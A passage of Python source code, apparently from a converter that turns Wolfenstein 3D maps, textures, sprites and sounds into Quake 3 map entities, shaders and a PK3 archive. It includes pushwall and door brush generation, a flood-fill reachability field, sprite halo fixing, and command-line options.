extreme_a = ((center_x - half), (center_y - 1), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders = [
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
'common/caulk',
]
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
door_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales, flip_directions=(EAST, WEST))
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door_hint(self, tile_coords):
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
vertical = cfg.DOOR_MAP[tile][2]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
face_shaders = ['common/skip'] * 6
if vertical:
extreme_a = ((center_x - 0), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders[WEST] = 'common/hint'
else:
extreme_a = ((center_x - half), (center_y - 0), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders[NORTH] = 'common/hint'
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
hint_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return hint_brush
def describe_floor_ceiling_clipping(self, thickness=1):
lines = []
face_shaders = ['common/full_clip'] * 6
shader_scales = (1, 1)
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), -thickness)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), 0)
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), tile_units)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (tile_units + thickness))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_underworld_hollow(self, offset_z=0, thickness=1): # TODO: factorized code for hollows
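        # Build a hollow box (top, bottom and four side slabs, each
        # `thickness` units thick) offset far below the playable map; this
        # "underworld" hosts helper entities such as the target_give items
        # spawned for collectables.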
lines = []
face_shaders = ['common/caulk'] * 6
shader_scales = [self.params.shader_scale, self.params.shader_scale]
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
t = thickness
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - 0 - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + t - tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - t + tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + 0 + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_a[0] + t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_b[0] - t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_a[1] + t), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_b[1] - t), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_worldspawn(self):
params = self.params
cfg = self.cfg
dimensions = self.tilemap.dimensions
tilemap = self.tilemap
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
music_name = cfg.MUSIC_LABELS[cfg.TILEMAP_MUSIC_INDICES[self.tilemap_index]]
lines = [
'{',
'classname worldspawn',
'music "music/{}/{}"'.format(params.short_name, music_name),
'ambient 100',
'_color "1 1 1"',
'message "{}"'.format(tilemap.name),
'author "{}"'.format(params.author),
]
if params.author2:
lines.append('author2 "{}"'.format(params.author2))
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=1,
cache=self.tile_partition_cache)
lines.append('// {} @ {!r} = tile 0x{:04X}'.format(partition, tile_coords, tile))
if (partition in ('floor', 'door', 'door_silver', 'door_gold', 'door_elevator') or
entity == pushwall_entity):
lines.extend(self.describe_area_brushes(tile_coords))
elif partition == 'wall':
lines.extend(self.describe_wall_brush(tile_coords))
else:
raise ValueError((tile_coords, partition))
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}, hint'.format(partition, tile_coords, tile))
lines += self.describe_door_hint(tile_coords)
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
if cfg.ENTITY_OBJECT_MAP.get(entity) in cfg.STATIC_OBJECT_NAMES:
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_sprite(tile_coords)
elif partition == 'enemy':
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_dead_enemy_sprite(tile_coords)
lines.append('// floor and ceiling clipping planes')
lines += self.describe_floor_ceiling_clipping()
lines.append('// underworld hollow')
lines += self.describe_underworld_hollow(params.underworld_offset)
lines.append('} // worldspawn')
return lines
def compute_progression_field(self, player_start_tile_coords):
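        # Breadth-first flood fill from the player start: every reachable tile
        # gets a 4-bit mask with one bit per direction, set when the adjacent
        # tile in that direction is walkable (no solid object, and not a wall
        # unless that wall carries a pushwall entity).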
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
wall_start = cfg.TILE_PARTITION_MAP['wall'][0]
wall_endex = wall_start + cfg.TILE_PARTITION_MAP['wall'][1]
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
field = {(x, y): 0 for y in range(dimensions[1]) for x in range(dimensions[0])}
        visited = {(x, y): False for y in range(dimensions[1]) for x in range(dimensions[0])}
border_tiles = collections.deque([player_start_tile_coords])
while border_tiles:
tile_coords = border_tiles.popleft()
if not visited[tile_coords]:
visited[tile_coords] = True
field_value = field[tile_coords]
x, y = tile_coords
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
xd, yd, _ = displacement
facing_coords = (x + xd, y + yd)
facing_tile = tilemap.get(facing_coords)
if facing_tile is not None:
object_name = cfg.ENTITY_OBJECT_MAP.get(facing_tile[1])
if (not visited[facing_coords] and object_name not in cfg.SOLID_OBJECT_NAMES and
(not (wall_start <= facing_tile[0] < wall_endex) or facing_tile[1] == pushwall_entity)):
border_tiles.append(facing_coords)
field_value |= (1 << direction)
field[tile_coords] = field_value
return field
def describe_player_start(self, tile_coords):
tile = self.tilemap[tile_coords]
index = tile[1] - self.cfg.ENTITY_PARTITION_MAP['start'][0]
origin = self.center_units(tile_coords, self.unit_offsets)
origin[2] += 32
player_start = [
'{',
'classname info_player_start',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
player_intermission = [
'{',
'classname info_player_intermission',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
return player_start + player_intermission
def describe_turn(self, tile_coords, turn_coords):
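        # Walk from this turning point along its own direction until another
        # turning point is hit, then emit a path_corner linking the two.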
tilemap = self.tilemap
index = tilemap[tile_coords][1] - self.cfg.ENTITY_PARTITION_MAP['turn'][0]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
step = TURN_TO_DISPL[index]
target_coords = [(tile_coords[0] + step[0]), (tile_coords[1] + step[1])]
lines = []
found = False
while tilemap.check_coords(target_coords):
for coords in turn_coords:
if coords[0] == target_coords[0] and coords[1] == target_coords[1]:
found = True
break
else:
target_coords[0] += step[0]
target_coords[1] += step[1]
if found:
break
else:
raise ValueError('no target turning point for the one at {!r}'.format(tile_coords))
lines += [
'{',
'classname path_corner',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(TURN_TO_YAW[index]),
'targetname "corner_{:.0f}_{:.0f}"'.format(*tile_coords),
'target "corner_{:.0f}_{:.0f}"'.format(*target_coords),
'}',
]
return lines
def describe_enemy(self, tile_coords, turn_tiles):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
direction, level = enemy[1], enemy[3]
if params.enemy_level_min <= level <= params.enemy_level_max and direction < 4:
angle = DIR_TO_YAW[ENEMY_INDEX_TO_DIR[direction]]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
return [
'{',
'classname info_player_deathmatch',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(angle),
'}',
]
return ()
def describe_dead_enemy_sprite(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
name = enemy[0] + '__dead'
face_shader = '{}_enemy/{}'.format(params.short_name, name)
return self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
else:
return ()
def describe_object(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
lines = []
name = cfg.ENTITY_OBJECT_MAP.get(tile[1])
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
lines += [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
lines.append('// TODO')
return lines
def describe_pushwall(self, tile_coords, progression_field):
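        # A pushwall is modelled as a func_door sliding along the first open
        # direction in the progression field; the trigger volume is shifted
        # one unit against that direction so the player fires it by walking
        # into the wall face.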
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
field_value = progression_field[tile_coords]
for direction in range(4):
if field_value & (1 << direction):
move_direction = direction
xd, yd = DIR_TO_DISPL[move_direction][:2]
break
else:
            raise ValueError('Pushwall @ {!r} cannot be reached or cannot move'.format(tile_coords))
trigger_begin = [
'{',
'classname trigger_multiple',
'target "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'wait {}'.format(params.pushwall_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[0] -= xd
unit_offsets[1] += yd
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/pushwall__move'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'angle {:.0f}'.format(DIR_TO_YAW[move_direction]),
'lip {}'.format(params.tile_units + 2),
'dmg 0',
'health 0',
'wait {}'.format(params.pushwall_wait),
'speed {}'.format(params.pushwall_speed),
# TODO: crusher
]
door_end = ['}']
# Door brush
face_shaders = []
texture = tile[0] - cfg.TILE_PARTITION_MAP['wall'][0]
for direction in range(4):
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
door_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
# Underworld brush
stop_coords = list(tile_coords)
steps = 0
while progression_field[tuple(stop_coords)] & (1 << move_direction) and steps < 3: # FIXME: magic 3
stop_coords[0] += xd
stop_coords[1] += yd
steps += 1
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(stop_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end + speaker_open_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_entities(self): # TODO
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
lines = []
turn_list = []
enemy_list = []
pushwall_list = []
player_start_coords = None
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
description = '// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity)
entity_object = cfg.ENTITY_OBJECT_MAP.get(entity)
if partition == 'start':
if player_start_coords is not None:
raise ValueError('There can be only one player start entity')
player_start_coords = tile_coords
lines.append(description)
lines += self.describe_player_start(tile_coords)
elif partition == 'turn':
turn_list.append([description, tile_coords])
elif partition == 'enemy':
enemy_list.append([description, tile_coords])
elif partition == 'pushwall':
pushwall_list.append([description, tile_coords])
elif entity_object in cfg.COLLECTABLE_OBJECT_NAMES:
lines.append(description)
lines += self.describe_collectable(tile_coords)
elif partition == 'object':
lines.append(description)
lines += self.describe_object(tile_coords)
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=-1,
cache=self.tile_partition_cache)
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}'.format(partition, tile_coords, tile))
lines += self.describe_door(tile_coords)
progression_field = self.compute_progression_field(player_start_coords)
for description, tile_coords in pushwall_list:
lines.append(description)
lines += self.describe_pushwall(tile_coords, progression_field)
turn_list_entities = [turn[1] for turn in turn_list]
# for description, tile_coords in turn_list:
# lines.append(description)
# lines += self.describe_turn(tile_coords, turn_list_entities)
for description, tile_coords in enemy_list:
lines.append(description)
lines += self.describe_enemy(tile_coords, turn_list_entities)
lines.append('// progression field')
lines += ['// ' + ''.join('{:X}'.format(progression_field[x, y]) for x in range(dimensions[0]))
for y in range(dimensions[1])]
return lines
def describe_tilemap(self):
tilemap = self.tilemap
lines = ['// map #e{}m{}: "{}"'.format(self.episode_index + 1, self.submap_index + 1, tilemap.name)]
lines += self.describe_worldspawn()
lines += self.describe_entities()
return lines
def build_argument_parser():
parser = argparse.ArgumentParser()
group = parser.add_argument_group('input paths')
group.add_argument('--input-folder', default='.')
group.add_argument('--vswap-data', required=True)
group.add_argument('--graphics-data', required=True)
group.add_argument('--graphics-header', required=True)
group.add_argument('--graphics-huffman', required=True)
group.add_argument('--audio-data', required=True)
group.add_argument('--audio-header', required=True)
group.add_argument('--maps-data', required=True)
group.add_argument('--maps-header', required=True)
group.add_argument('--palette') # TODO
group = parser.add_argument_group('output paths')
group.add_argument('--output-folder', default='.')
group.add_argument('--output-pk3', required=True)
group = parser.add_argument_group('settings')
group.add_argument('--cfg', required=True)
group.add_argument('--short-name', default='wolf3d')
group.add_argument('--author', default='(c) id Software')
group.add_argument('--author2')
group.add_argument('--wave-rate', default=22050, type=int)
group.add_argument('--imf-rate', default=700, type=int)
group.add_argument('--imf2wav-path', default=IMF2WAV_PATH)
group.add_argument('--ogg-rate', default=44100, type=int)
group.add_argument('--oggenc2-path', default=OGGENC2_PATH)
group.add_argument('--tile-units', default=96, type=int)
group.add_argument('--alpha-index', default=0xFF, type=int)
group.add_argument('--fix-alpha-halo', action='store_true')
group.add_argument('--texture-scale', default=4, type=int)
group.add_argument('--shader-scale', default=0.375, type=float)
group.add_argument('--door-wait', default=5, type=float)
group.add_argument('--door-speed', default=100, type=float)
group.add_argument('--door-trigger-wait', default=5, type=float)
group.add_argument('--pushwall-wait', default=32767, type=float)
group.add_argument('--pushwall-speed', default=90, type=float)
group.add_argument('--pushwall-trigger-wait', default=32767, type=float)
group.add_argument('--underworld-offset', default=-4096, type=int)
group.add_argument('--enemy-level-min', default=0, type=int)
group.add_argument('--enemy-level-max', default=3, type=int)
return parser
def _sep():
logger = logging.getLogger()
logger.info('-' * 80)
def export_textures(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting textures')
start = 0
count = vswap_chunks_handler.sprites_start - start
texture_manager = pywolf.graphics.TextureManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count)
scaled_size = [side * params.texture_scale for side in cfg.TEXTURE_DIMENSIONS]
for i, texture in enumerate(texture_manager):
name = cfg.TEXTURE_NAMES[i >> 1]
path = 'textures/{}_wall/{}__{}.tga'.format(params.short_name, name, (i & 1))
logger.info('Texture [%d/%d]: %r', (i + 1), count, path)
image = texture.image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, scaled_size, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
palette = cfg.GRAPHICS_PALETTE
for i, color in enumerate(palette):
path = 'textures/{}_palette/color_0x{:02x}.tga'.format(params.short_name, i)
logger.info('Texture palette color [%d/%d]: %r, (0x%02X, 0x%02X, 0x%02X)',
(i + 1), len(palette), path, *color)
image = build_color_image(cfg.TEXTURE_DIMENSIONS, color)
image = image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, cfg.TEXTURE_DIMENSIONS, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
logger.info('Done')
_sep()
def write_texture_shaders(params, cfg, shader_file, palette_shaders=True):
for name in cfg.TEXTURE_NAMES:
for j in range(2):
shader_name = 'textures/{}_wall/{}__{}'.format(params.short_name, name, j)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
if palette_shaders:
palette = cfg.GRAPHICS_PALETTE
for i in range(len(palette)):
shader_name = 'textures/{}_palette/color_0x{:02x}'.format(params.short_name, i)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
def write_static_shaders(params, cfg, shader_file):
for name in cfg.STATIC_OBJECT_NAMES:
shader_name = 'textures/{}_static/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_collectable_shaders(params, cfg, shader_file):
for name in cfg.COLLECTABLE_OBJECT_NAMES:
shader_name = 'textures/{}_collectable/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_enemy_shaders(params, cfg, shader_file):
ignored_names = cfg.STATIC_OBJECT_NAMES + cfg.COLLECTABLE_OBJECT_NAMES
names = [name for name in cfg.SPRITE_NAMES if name not in ignored_names or name.endswith('__dead')]
for name in names:
shader_name = 'textures/{}_enemy/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def export_shader(params, cfg, zip_file, script_name, shader_writer):
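    # Write the generated shader script twice: into the PK3 under scripts/,
    # and as a plain file in <output_folder>/scripts for inspection outside
    # the archive.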
shader_text_stream = io.StringIO()
shader_writer(params, cfg, shader_text_stream)
shader_text = shader_text_stream.getvalue()
zip_file.writestr('scripts/{}'.format(script_name), shader_text.encode())
folder = os.path.join(params.output_folder, 'scripts')
os.makedirs(folder, exist_ok=True)
with open(os.path.join(folder, script_name), 'wt') as shader_file:
shader_file.write(shader_text)
def export_shaders(params, cfg, zip_file):
logger = logging.getLogger()
logger.info('Exporting shaders')
script_writer_map = {
'{}_wall.shader'.format(params.short_name): write_texture_shaders,
'{}_static.shader'.format(params.short_name): write_static_shaders,
'{}_collectable.shader'.format(params.short_name): write_collectable_shaders,
'{}_enemy.shader'.format(params.short_name): write_enemy_shaders,
}
for script_name, shader_writer in script_writer_map.items():
export_shader(params, cfg, zip_file, script_name, shader_writer)
logger.info('Done')
_sep()
def image_to_array(image, shape, dtype=np.uint8):
return np.array(image.getdata(), dtype).reshape(shape)
def array_to_rgbx(arr, size, channels):
assert 3 <= channels <= 4
mode = 'RGBA' if channels == 4 else 'RGB'
arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2]).astype(np.uint8)
if channels == 4 and len(arr[0]) == 3: # FIXME: make generic, this is only for RGB->RGBA
arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]
    return Image.frombuffer(mode, size, arr.tobytes(), 'raw', mode, 0, 1)  # tobytes(): tostring() is deprecated in NumPy
def fix_sprite_halo(rgba_image, alpha_layer):
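    # Alpha-bleeding pass: every fully transparent pixel takes the average
    # colour of its opaque 8-neighbours (alpha stays 0), so bilinear filtering
    # of the upscaled sprite no longer blends edge pixels towards black.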
alpha_layer = image_to_array(alpha_layer, rgba_image.size)
mask_cells = (alpha_layer != 0)
mask = mask_cells.astype(np.uint8)
source = image_to_array(rgba_image, rgba_image.size + (4,))
source *= mask[..., None].repeat(4, axis=2)
accum = np.zeros_like(source, np.uint16)
accum[ :-1, : ] += source[1: , : ]
accum[1: , : ] += source[ :-1, : ]
accum[ : , :-1] += source[ : , 1: ]
accum[ : , 1: ] += source[ : , :-1]
accum[ :-1, :-1] += source[1: , 1: ]
accum[ :-1, 1: ] += source[1: , :-1]
accum[1: , :-1] += source[ :-1, 1: ]
accum[1: , 1: ] += source[ :-1, :-1]
count = np.zeros_like(mask)
count[ :-1, : ] += mask[1: , : ]
count[1: , : ] += mask[ :-1, : ]
count[ : , :-1] += mask[ : , 1: ]
count[ : , 1: ] += mask[ : , :-1]
count[ :-1, :-1] += mask[1: , 1: ]
count[ :-1, 1: ] += mask[1: , :-1]
count[1: , :-1] += mask[ :-1, 1: ]
count[1: , 1: ] += mask[ :-1, :-1]
count_div = np.maximum(np.ones_like(count), count)
count_div = count_div[..., None].repeat(4, axis=2)
accum = (accum // count_div).astype(np.uint8)
accum[..., 3] = 0
accum[mask_cells] = source[mask_cells]
result = array_to_rgbx(accum, rgba_image.size, 4)
return result
def export_sprites(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sprites')
start = vswap_chunks_handler.sprites_start
count = vswap_chunks_handler.sounds_start - start
sprite_manager = pywolf.graphics.SpriteManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count, params.alpha_index)
scaled_size = [side * params.texture_scale for side in cfg.SPRITE_DIMENSIONS]
for i, sprite in enumerate(sprite_manager):
name = cfg.SPRITE_NAMES[i]
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
logger.info('Sprite [%d/%d]: %r', (i + 1), count, path)
image = sprite.image.convert('RGBA')
if params.fix_alpha_halo:
alpha_layer = image.split()[-1].transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
image = image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size)
if params.fix_alpha_halo:
image = fix_sprite_halo(image, alpha_layer)
pixels_bgra = bytes(x for pixel in image.getdata()
for x in [pixel[2], pixel[1], pixel[0], pixel[3]])
sprite_stream = io.BytesIO()
write_targa_bgrx(sprite_stream, scaled_size, 32, pixels_bgra)
zip_file.writestr(path, sprite_stream.getbuffer())
logger.info('Done')
_sep()
def export_pictures(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting pictures')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['pics']
picture_manager = pywolf.graphics.PictureManager(graphics_chunks_handler, palette_map, start, count)
for i, picture in enumerate(picture_manager):
path = 'gfx/{}/{}.tga'.format(params.short_name, cfg.PICTURE_NAMES[i])
logger.info('Picture [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = picture.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
picture_stream = io.BytesIO()
write_targa_bgrx(picture_stream, picture.dimensions, 24, pixels_bgr)
zip_file.writestr(path, picture_stream.getbuffer())
logger.info('Done')
_sep()
def export_tile8(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting tile8')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
palette_map = cfg.GRAPHICS_PALETTE_MAP
start, count = partitions_map['tile8']
tile8_manager = pywolf.graphics.Tile8Manager(graphics_chunks_handler, palette_map, start, count)
for i, tile8 in enumerate(tile8_manager):
path = 'gfx/{}/tile8__{}.tga'.format(params.short_name, cfg.TILE8_NAMES[i])
logger.info('Tile8 [%d/%d]: %r', (i + 1), count, path)
top_bottom_rgb_image = tile8.image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in top_bottom_rgb_image.getdata() for x in reversed(pixel))
tile8_stream = io.BytesIO()
write_targa_bgrx(tile8_stream, tile8.dimensions, 24, pixels_bgr)
zip_file.writestr(path, tile8_stream.getbuffer())
logger.info('Done')
_sep()
def export_screens(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting DOS screens')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['screens']
screen_manager = pywolf.graphics.DOSScreenManager(graphics_chunks_handler, start, count)
for i, screen in enumerate(screen_manager):
path = 'texts/{}/screens/{}.scr'.format(params.short_name, cfg.SCREEN_NAMES[i])
logger.info('DOS Screen [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, screen.data)
logger.info('Done')
_sep()
def export_helparts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting HelpArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['helpart']
helpart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, helpart in enumerate(helpart_manager):
path = 'texts/{}/helpart/helpart_{}.txt'.format(params.short_name, i)
logger.info('HelpArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, helpart.encode('ascii'))
logger.info('Done')
_sep()
def export_endarts(params, cfg, zip_file, graphics_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting EndArt texts')
partitions_map = cfg.GRAPHICS_PARTITIONS_MAP
start, count = partitions_map['endart']
endart_manager = pywolf.graphics.TextArtManager(graphics_chunks_handler, start, count)
for i, endart in enumerate(endart_manager):
path = 'texts/{}/endart/endart_{}.txt'.format(params.short_name, i)
logger.info('EndArt [%d/%d]: %r', (i + 1), count, path)
zip_file.writestr(path, endart.encode('ascii'))
logger.info('Done')
_sep()
def export_sampled_sounds(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting sampled sounds')
start = vswap_chunks_handler.sounds_start
count = len(vswap_chunks_handler.sounds_infos)
sample_manager = pywolf.audio.SampledSoundManager(vswap_chunks_handler,
cfg.SAMPLED_SOUND_FREQUENCY,
start, count)
scale_factor = params.wave_rate / cfg.SAMPLED_SOUND_FREQUENCY
for i, sound in enumerate(sample_manager):
name = cfg.SAMPLED_SOUND_NAMES[i]
path = 'sound/{}/sampled/{}.wav'.format(params.short_name, name)
logger.info('Sampled sound [%d/%d]: %r', (i + 1), count, path)
samples = bytes(samples_upsample(sound.samples, scale_factor))
wave_file = io.BytesIO()
wave_write(wave_file, params.wave_rate, samples)
zip_file.writestr(path, wave_file.getbuffer())
logger.info('Done')
_sep()
def export_musics(params, cfg, zip_file, audio_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting musics')
start, count = cfg.AUDIO_PARTITIONS_MAP['music']
for i in range(count):
chunk_index = start + i
name = cfg.MUSIC_LABELS[i]
path = 'music/{}/{}.ogg'.format(params.short_name, name)
logger.info('Music [%d/%d]: %r', (i + 1), count, path)
imf_chunk = audio_chunks_handler[chunk_index]
